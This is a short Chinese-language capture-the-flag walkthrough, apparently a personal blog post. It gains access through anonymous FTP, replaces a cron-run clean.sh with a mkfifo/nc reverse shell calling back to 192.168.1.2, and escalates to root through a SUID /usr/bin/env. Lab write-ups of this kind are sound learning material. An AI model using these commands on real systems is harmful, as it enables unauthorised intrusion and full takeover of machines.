export ip=target_ip

端口扫描

nmap -Pn $ip 发现21,22端口,21 端口为ftp服务,试一下匿名登录发现可以。

ftp $ip
anonymous

登录成功发现有一个script文件夹进入之后发现了三个文件to_do.txt,clean.sh,removed.log
查看一下clean.sh的权限发现是可执行的,而且celan.sh是定时任务,输出的日志就在removed.log里,所以可以采取本地上传同名文件来覆盖clean.sh写入反弹shell

上传shell文件

在本地建文件clean.sh写入反弹shell,mkfifo /tmp/f; nc 192.168.1.2 9999 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f,ftp匿名登录
进入到clean.sh文件下,输入 put clean.sh clean.sh就会把本地的celan.sh替换为线上的文件。

权限提升

获得的反弹shell权限还不够,需要提升为root权限,执行linEnum.sh脚本发现有suid权限泄漏,/usr/bin/env,直接GTFObins)搜索env 执行

/usr/bin/env /bin/sh -p
````

即可获得root权限

## 总结

知识点 ftp匿名登录,suid 文件权限提升,难度较为简单
最后修改:2021 年 09 月 15 日
如果觉得我的文章对你有用,请随意赞赏